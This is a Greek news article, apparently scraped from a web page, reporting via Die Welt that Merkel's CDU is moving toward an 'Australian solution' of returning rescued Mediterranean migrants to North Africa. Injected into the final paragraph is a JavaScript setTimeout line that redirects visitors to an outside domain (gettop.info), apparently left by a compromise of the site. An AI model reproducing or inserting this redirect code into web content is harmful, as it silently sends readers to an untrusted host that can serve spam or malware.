Προς τη «λύση Αυστραλίας» στο προσφυγικό τείνει το κόμμα της Μέρκελ

0
6

 

To κόμμα της Μέρκελ αλλάζει προσανατολισμό και σκληραίνει τη στάση του στο προσφυγικό, καθώς το κατευθυντήριο σχέδιο ενόψει του συνεδρίου του τον Δεκέμβριο προβλέπει την άμεση προώθηση των διασωθέντων προσφύγων στη Βόρεια Αφρική. Επίσης γίνεται και λόγος για «ζώνες διέλευσης» στα σύνορα, σύμφωνα με την «Die Welt».

«Τα γεγονότα του παρελθόντος έτους δεν επιτρέπεται να επαναληφθούν» αναφερόταν ήδη στο αρχικό κείμενο του σχεδίου και «το κλείσιμο του βαλκανικού διαδρόμου», κατά του οποίου καταφερόταν ακόμη την άνοιξη η Μέρκελ, αναγνωριζόταν ως «επιτυχία», σημειώνεται στο δημοσίευμα και προστίθεται: «Ένα εδάφιο, όμως, το οποίο αφορά στην μεταχείριση των προσφύγων οι οποίοι κινδυνεύουν να πνιγούν στη Μεσόγειο γίνεται αυστηρότερο: «Θα πρέπει να μην μεταφέρονται πλέον μετά την διάσωσή τους στην Ιταλία ώστε να ακολουθήσει η προβλεπόμενη διαδικασία ασύλου», είναι η τελική διατύπωση. Οι Γερμανοί χριστιανοδημοκράτες προτείνουν επίσης τώρα να δημιουργηθούν «δυνατότητες επί τόπου υποδοχής τους». Aυτό σημαίνει ότι άνθρωποι οι οποίοι βρίσκονται στις βάρκες των παράνομων διακινητών και διασώζονται από τον πνιγμό θα μεταφέρονται πίσω στις αφρικανικές ακτές».

Σε αυτήν τη διατύπωση ακριβώς η γερμανική εφημερίδα επισημαίνει ότι αποδεικνύεται πως το CDU κινείται πλέον προς τη λεγόμενη «λύση Αυστραλίας»,την οποία πρότεινε ο Αυστριακός ΥΠΕΞ Σεμπάστιαν Κουρτς και την οποία απέρριπτε μέχρι πρότινος η Γερμανίδα καγκελάριος, επισημαίνει η Die Welt. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here